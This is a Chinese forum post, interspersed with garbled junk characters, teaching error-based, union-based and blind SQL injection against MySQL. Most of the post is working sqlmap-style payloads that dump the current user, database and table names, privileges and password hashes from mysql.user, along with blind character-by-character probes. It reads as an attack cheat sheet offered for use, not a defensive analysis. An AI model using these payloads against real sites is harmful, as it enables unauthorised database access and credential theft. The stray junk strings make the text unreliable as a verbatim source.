放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。& A5 w- I, `. f& e
5 o# J% }+ M* f& Z5 p+ X
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表 L) v* @& l& q
: @% B" c( B5 K, t0 Z6 u
分类标准 分类 备注# i! E8 g5 b9 W4 t+ @
按字段类型 整型注入,字符型注入 5 F" b; J, n. L$ |3 a" k# b
按出现的位置 get注入,post注入,cookie注入,http header注入 " i$ q. _0 U5 B1 h" K
然而高级注入是这样的
+ z& A. J/ D1 `" |4 G
; U3 t& F( N" t& K0 u: A高级注入分类 条件3 Q0 ]* X0 m7 m1 Y+ c* g
error-based sql 数据库的错误回显可以返回,存在数据库,表结构1 Y2 Q& W) I' ?; e
union-based sql 能够使用union,存在数据库,表结构
. c& O e! l$ C$ F: H* x$ sblind sql 存在注入. Q& L' d: f. z7 @
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。4 N3 g! c& o7 E) h9 I% X0 z) j: r
" [3 j7 G2 T/ `; q好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
' z2 w1 {# {/ r
' @% j% t5 Y9 Y7 X' W附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。+ ~7 |: M/ [; L5 ~3 K( V8 X
+ y4 J7 u! U: N, |# R& _; d; ?这里用mysql说明
, \3 n% @) j* b3 r! U/ m
p# ~% N' E7 D8 S* s- Ke注入坛子里很多了,请看戳我或者再戳我
3 Y6 O$ O( h3 }9 B
( r+ X; Z- w2 r' ]- E8 L+ Qu注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
, r' I6 r4 F& Z7 y! T; ~4 G( z
" F' h& R! q; {! ~/ L& W获取当前数据库用户名
& A4 H8 t+ [. n8 r# Y; f4 p" a& e
3 h* K4 ]# M) rUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
! H$ g( {# I) ~. BAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL& n! l+ E$ G; J
L, NULL#" R, D8 r: q9 s6 t! |
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
% S) v/ V/ L' u+ Z
9 t1 S0 x: m% q+ x获取数据库名
- \1 T N* U) S3 [5 ^ 3 U( g4 U! @9 e+ I- R! L5 T8 K9 i2 i* {
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL## _* s; C' ~5 R) k. r! A: I& q
获取所有用户名
$ M: q: z* X0 I; O1 Z1 p
2 @* f8 j4 Z, o1 i7 ^UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#9 g8 f$ _/ @, h, P
查看当前用户权限
' N& I- b- b3 J) N, q9 o2 ]$ T
% |! N3 y" J5 t+ l+ R) UUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
& u6 M# f0 a# P% z7 q尝试获取密码,当然需要有能读mysql数据库的权限' D' B- r' R. T
6 [7 s4 d% E* p" z
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#% I2 i2 } J1 j; B! i
获取表名,limit什么的自己搞啦% T! p, o% Z; S) S7 k* x
; c0 \: t1 b, h+ \5 Z
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#/ ]) W9 R5 T: E
获取字段名及其类型( r. x% U9 e: W' E6 K
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#7 b2 x" Z2 [. s0 B+ m1 J0 l$ p
4 z4 U, ?/ d* V! [- n4 ~( L1 r" _b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
6 ?$ z) m ~4 ]) u$ f+ ~ ! o& @* ?! R0 t+ V% Y
如:- R/ ^- Z& A6 M1 w `
获取当前用户名+ b3 d9 D1 ]* Y" ` |, [ S
- Z" ~! m, I% E. J# c, l
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
- A7 |5 J$ N" U获取当前数据库
% S2 Q% c2 A( \
* `& K! v8 M) {" z+ N" B0 ^AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106+ M7 _! a4 j% R! }3 ?2 T; a
获取表名
; j6 w1 {! E1 t
3 x- y' p9 \& aAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51( w) X; W9 n `) s$ J# F
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。4 S* H3 c9 a1 _- U2 h. [
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
8 S6 e8 M7 _& d- |0 e爆表
+ ^) Y8 ]/ o" O0 q! ~, }9 E" ~9 a
' u# {( Q- T- b. Z, u; g) Z9 [AND EXISTS(select * from table)# [5 Y, B) G- e) X* o: k: R
爆字段
) o" Q7 T. r9 [ 2 _; C6 T7 R6 V, _$ K3 q( u
AND EXISTS(select pwd from table)& k3 X S& ]0 E# Z! b" v
盲注的变化就比较多了,由于篇幅,只是举个例子而已。
* g2 T; E. r2 I2 s- B, ~
; f8 k( j2 P& k& i* F, ]本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
0 N' J! y. p6 F: z# ^* L6 A |